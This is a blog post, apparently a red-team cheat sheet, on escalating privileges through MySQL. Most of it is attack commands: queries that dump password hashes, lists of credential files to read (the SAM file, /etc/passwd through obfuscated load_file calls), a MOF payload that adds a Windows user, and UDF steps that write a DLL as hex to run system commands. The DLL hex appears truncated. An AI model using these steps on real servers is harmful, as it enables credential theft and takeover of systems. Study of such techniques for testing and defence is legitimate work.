MySQL Privilege Escalation Notes

0x0021h
4 min readNov 15, 2021

--

Determining MySQL runtime privileges

net user

Check the current account of the system, if there is a mysql such user, it means that the system may be downgraded.

Mysql Password Query

1. select user,password from mysql.user;
2. select user,password from mysql.user where user ='root';

Some common system configuration files

1. c:/boot.ini //check system version2. c:/windows/php.ini //php configuration information3. c:/windows/my.ini //MYSQL configuration file, record the MYSQL username and password that the administrator has logged in4. c:/winnt/php.ini5. c:/winnt/my.ini6. c:\mysql\data\mysql\user.MYD //stores the database connection password in the mysql.user table7. c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini //stores the web hosting site path and password8. c:\Program Files\Serv-U\ServUDaemon.ini9. c:\windows\system32\inetsrv\MetaBase.xml View the IIS virtual host configuration10. c:\windows\repair\sam //stores the password for the initial installation of the WINDOWS system11. c:\Program Files\ Serv-U\ServUAdmin.exe // version 6.0 before the serv-u administrator password is stored here12. c:\Program Files\RhinoSoft.com\ServUDaemon.exe13. c:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif file14. //stores the login password for pcAnywhere15. c:\Program Files\Apache Group\Apache\conf\httpd.conf or C:\apache\conf\httpd.conf //View the WINDOWS system apache file16. c:/Resin-3.0.14/conf/resin.conf //View the jsp development site resin file configuration information.17. c:/Resin/conf/resin.conf /usr/local/resin/conf/resin.conf View the JSP virtual host configured for linux system18. d:\APACHE\Apache2\conf\httpd.conf19. c:\Program Files\mysql\my.ini20. c:\mysql\data\mysql\user.MYD Existing user passwords in MYSQL system

LUNIX/UNIX:

1. /usr/local/app/apache2/conf/httpd.conf //apache2 default configuration file2. /usr/local/apache2/conf/httpd.conf3. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //virtual-site settings4. /usr/local/app/php5/lib/php.ini //PHP-related settings5. /etc/sysconfig/iptables //get firewall rules policy from it6. /etc/httpd/conf/httpd.conf // apache configuration file7. /etc/rsyncd.conf // synchronization program configuration file8. /etc/my.cnf // mysql configuration file9. /etc/redhat-release // system version10. /etc/issue11. /etc/issue.net12. /usr/local/app/php5/lib/php.ini //PHP-related settings13. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf //virtual-site settings14. /etc/httpd/conf/httpd.conf or /usr/local/apche/conf/httpd.conf View linux APACHE virtual host configuration file15. /usr/local/resin-3.0.22/conf/resin.conf View the RESIN configuration file for 3.0.2216. /usr/local/resin-pro-3.0.22/conf/resin.conf as above17. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE virtual host view18. /etc/httpd/conf/httpd.conf or /usr/local/apche/conf /httpd.conf View linux APACHE virtual host configuration file19. /usr/local/resin-3.0.22/conf/resin.conf View the RESIN configuration file for 3.0.2220. /usr/local/resin-pro-3.0.22/conf/resin.conf as above21. /usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE virtual host view22. /etc/sysconfig/iptables View firewall policies23. load_file(char(47)) to list FreeBSD, Sunos system root directory24. replace(load_file(0×2F6574632F706173737764),0×3c,0×20)25. replace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))

MOF

Utilization conditions:

1. windows 03 and below

2. mysql boot identity has permission to read and write to the c:/windows/system32/wbem/mof directory

3. secure-file-priv parameter is empty

then

Upload the MOF file to a directory with read/write permissions

Import the file to c:/windows/system32/wbme/mof/

select load_file("C:/Documents and Settings/testtest.mof") into dumpfile "c:/windows/system32/wbem/mof/nullevt.mof"

Exploit:

#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{EventNamespace = "Root\\Cimv2";Name = "filtP2";Query = "Select * From __InstanceModificationEvent ""Where TargetInstance Isa \"Win32_LocalTime\" ""And TargetInstance.Second = 5";QueryLanguage = "WQL";};instance of ActiveScriptEventConsumer as $Consumer{Name = "consPCSV2";ScriptingEngine = "JScript";ScriptText ="var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user hpdoger 123456 /add\")";};instance of __FilterToConsumerBinding{Consumer = $Consumer;Filter = $EventFilter;};

⚠️WARNING

After our successful exploitation, even if the account is deleted, mof will rebuild the original account within five seconds. Just use the following command to delete the account:

net stop winmgmtdel c:/windows/system32/wbem/repositorynet start winmgmt

UDF

Utilization conditions

1) Mysql version greater than 5.1 udf.dll file must be placed in the lib\plugin folder under MYSQL installation directory.

2) Mysql version is less than version 5.1. udf.dll file is placed under c:\windows\system32 in Windows 2003 and c:\winnt\system32 in windows 2000.

3) The account of the mysql database has the insert and delete permissions to mysql to create and discard functions, generally the root account is preferred, and other accounts with the permissions that the `root account has can also be used.

4. the permission to write udf.dll to the appropriate directory.

STEP:

  1. Check the secure_file_priv
show global variables like 'secure%';

- When the value of secure_file_priv is NULL, it means that mysqld is restricted from importing|exporting and cannot be privileged.

When the value of secure_file_priv is /tmp/, it means that mysqld import/export is restricted to the /tmp/ directory and cannot be privileged.

When the value of secure_file_priv has no specific value, it means that the import/export of mysqld is not restricted, so you can withdraw privileges.

2. Check Plugin

select Host,user,plugin from mysql.user where user = substring_index(user(),'@',1);

No privileges when the plugin value is empty

When the plugin value is mysql_native_password, it can be privileged through the account connection

3. View system architecture

show variables like '%compile%';

4. Check the plugin directory

show variables like 'plugin%';

The current mysql user needs to have write access to this directory

5. Write the dll file to the plugin directory, and create the function

create table temp(data longblob);insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);select data from temp into dumpfile "G:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf.dll";create function sys_eval returns string soname 'udf.dll';

Error: Can’t create/write to file ….. When MySQL is larger than 5.1, there is no lib/plugin directory by default. And into dumpfile can’t create a folder when writing to a file.

6. Execute system commands

select * from mysql.func where name = 'sys_eval'; #View the created sys_eval functionselect sys_eval('whoami'); # Use system command

--

--

0x0021h
0x0021h

Written by 0x0021h

#InfoSec | #RedTeam | #OSINT | #CyberSec | #Pentest

No responses yet